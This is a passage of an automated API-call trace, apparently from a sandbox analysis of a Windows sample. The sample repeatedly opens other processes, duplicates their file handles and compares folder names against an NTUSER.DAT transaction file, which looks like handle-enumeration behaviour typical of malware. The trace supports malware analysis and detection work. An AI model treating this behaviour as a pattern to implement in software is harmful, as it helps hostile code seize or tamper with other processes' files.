_wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.848] CloseHandle (hObject=0x194) returned 1 [0164.848] CloseHandle (hObject=0x1e8) returned 1 [0164.848] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1e8 [0164.848] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.849] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.850] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.850] CloseHandle (hObject=0x1e4) returned 1 [0164.850] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.850] CloseHandle (hObject=0x194) returned 1 [0164.850] CloseHandle (hObject=0x1e8) returned 1 [0164.850] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0164.850] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.850] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.851] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.851] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.852] CloseHandle (hObject=0x1e4) returned 1 [0164.852] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.852] CloseHandle (hObject=0x194) returned 1 [0164.852] CloseHandle (hObject=0x1e8) returned 1 [0164.852] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc0) returned 0x1e8 [0164.852] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.853] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.854] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.854] CloseHandle (hObject=0x1e4) returned 1 [0164.854] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.854] CloseHandle (hObject=0x194) returned 1 [0164.854] CloseHandle (hObject=0x1e8) returned 1 [0164.854] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0164.854] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.855] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.855] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.855] CloseHandle (hObject=0x1e4) returned 1 [0164.856] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.856] CloseHandle (hObject=0x194) returned 1 [0164.856] CloseHandle (hObject=0x1e8) returned 1 [0164.856] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x534) returned 0x1e8 [0164.856] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.856] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.857] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.857] CloseHandle (hObject=0x1e4) returned 1 [0164.857] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.857] CloseHandle (hObject=0x194) returned 1 [0164.857] CloseHandle (hObject=0x1e8) returned 1 [0164.857] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0164.857] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.858] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.862] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.869] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.869] CloseHandle (hObject=0x1e4) returned 1 [0164.870] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.870] CloseHandle (hObject=0x194) returned 1 [0164.870] CloseHandle (hObject=0x1e8) returned 1 [0164.870] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x70c) returned 0x1e8 [0164.870] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.876] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.879] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.880] CloseHandle (hObject=0x1e4) returned 1 [0164.880] _wcsicmp (_Str1="\\Windows NT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.880] CloseHandle (hObject=0x194) returned 1 [0164.880] CloseHandle (hObject=0x1e8) returned 1 [0164.880] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0164.880] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.880] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.881] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.882] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.882] CloseHandle (hObject=0x1e4) returned 1 [0164.882] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.882] CloseHandle (hObject=0x194) returned 1 [0164.882] CloseHandle (hObject=0x1e8) returned 1 [0164.882] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x290) returned 0x1e8 [0164.882] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.883] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.883] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.883] CloseHandle (hObject=0x1e4) returned 1 [0164.884] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.884] CloseHandle (hObject=0x194) returned 1 [0164.884] CloseHandle (hObject=0x1e8) returned 1 [0164.884] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0164.884] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.884] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.885] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.886] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.886] CloseHandle (hObject=0x1e4) returned 1 [0164.886] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.886] CloseHandle (hObject=0x194) returned 1 [0164.886] CloseHandle (hObject=0x1e8) returned 1 [0164.886] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7b0) returned 0x1e8 [0164.886] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.887] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.887] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.888] CloseHandle (hObject=0x1e4) returned 1 [0164.888] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.888] CloseHandle (hObject=0x194) returned 1 [0164.888] CloseHandle (hObject=0x1e8) returned 1 [0164.888] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0164.888] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.888] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.889] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.889] CloseHandle (hObject=0x1e4) returned 1 [0164.889] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.889] CloseHandle (hObject=0x194) returned 1 [0164.889] CloseHandle (hObject=0x1e8) returned 1 [0164.889] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e8 [0164.890] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.890] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.891] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.891] CloseHandle (hObject=0x1e4) returned 1 [0164.891] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.891] CloseHandle (hObject=0x194) returned 1 [0164.891] CloseHandle (hObject=0x1e8) returned 1 [0164.891] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0164.892] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.892] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.892] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.893] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.893] CloseHandle (hObject=0x1e4) returned 1 [0164.893] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.893] CloseHandle (hObject=0x194) returned 1 [0164.893] CloseHandle (hObject=0x1e8) returned 1 [0164.894] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x780) returned 0x1e8 [0164.894] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.894] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.905] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.905] CloseHandle (hObject=0x1e4) returned 1 [0164.905] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.905] CloseHandle (hObject=0x194) returned 1 [0164.905] CloseHandle (hObject=0x1e8) returned 1 [0164.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0164.905] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.907] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.908] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.908] CloseHandle (hObject=0x1e4) returned 1 [0164.908] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.908] CloseHandle (hObject=0x194) returned 1 [0164.908] CloseHandle (hObject=0x1e8) returned 1 [0164.908] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x10c) returned 0x1e8 [0164.908] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.908] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.909] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.909] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.910] CloseHandle (hObject=0x1e4) returned 1 [0164.910] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.910] CloseHandle (hObject=0x194) returned 1 [0164.910] CloseHandle (hObject=0x1e8) returned 1 [0164.910] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0164.910] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.911] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.912] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.912] CloseHandle (hObject=0x1e4) returned 1 [0164.912] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.912] CloseHandle (hObject=0x194) returned 1 [0164.912] CloseHandle (hObject=0x1e8) returned 1 [0164.912] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x208) returned 0x1e8 [0164.912] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.913] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.914] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.914] CloseHandle (hObject=0x1e4) returned 1 [0164.914] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.914] CloseHandle (hObject=0x194) returned 1 [0164.914] CloseHandle (hObject=0x1e8) returned 1 [0164.914] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0164.914] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.915] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.916] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.916] CloseHandle (hObject=0x1e4) returned 1 [0164.916] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.916] CloseHandle (hObject=0x194) returned 1 [0164.916] CloseHandle (hObject=0x1e8) returned 1 [0164.916] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x1e8 [0164.916] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.917] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.921] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.921] CloseHandle (hObject=0x1e4) returned 1 [0164.922] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.922] CloseHandle (hObject=0x194) returned 1 [0164.922] CloseHandle (hObject=0x1e8) returned 1 [0164.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0164.922] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.923] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.923] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.924] CloseHandle (hObject=0x1e4) returned 1 [0164.924] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.924] CloseHandle (hObject=0x194) returned 1 [0164.924] CloseHandle (hObject=0x1e8) returned 1 [0164.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x798) returned 0x1e8 [0164.924] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.925] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.925] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.926] CloseHandle (hObject=0x1e4) returned 1 [0164.926] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.926] CloseHandle (hObject=0x194) returned 1 [0164.926] CloseHandle (hObject=0x1e8) returned 1 [0164.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0164.926] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.927] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.928] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.928] CloseHandle (hObject=0x1e4) returned 1 [0164.928] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0164.928] CloseHandle (hObject=0x194) returned 1 [0164.928] CloseHandle (hObject=0x1e8) returned 1 [0164.928] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5dc) returned 0x1e8 [0164.928] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.928] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 